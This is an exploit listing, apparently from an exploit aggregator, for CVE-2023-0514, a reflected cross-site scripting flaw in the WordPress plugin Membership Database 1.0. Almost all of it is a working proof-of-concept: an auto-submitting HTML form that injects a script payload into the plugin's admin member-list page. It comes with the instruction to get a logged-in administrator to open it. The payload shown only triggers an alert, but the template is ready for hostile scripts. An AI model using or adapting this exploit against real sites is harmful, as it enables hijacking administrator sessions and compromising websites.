Exploit for Membership Database <= 1.0 - Reflected XSS CVE-2023-0514

Name: Exploit for Membership Database <= 1.0 - Reflected XSS CVE-2023-0514
Rating: 5 (56 reviews)

2023-04-17 | CVSS 5.8

## https://sploitus.com/exploit?id=WPEX-ID:C6CC400A-9BFB-417D-9206-5582A49D0F05
Make a logged in admin open a page with the code below

<html>
  <body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin.php?page=member-database%2Flist_members.php" method="POST">
      <input type="hidden" name="action" value="sort" />
      <input type="hidden" name="where" value="id" />
      <input type="hidden" name="operator" value="&#61;" />
      <input type="hidden" name="value" value="asd&quot;&lt;&#47;script&gt;&lt;script&gt;alert&#40;document&#46;domain&#41;&lt;&#47;script&gt;&#47;&#47;" />
      <input type="hidden" name="sortBy" value="id" />
      <input type="hidden" name="ascdesc" value="asc" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>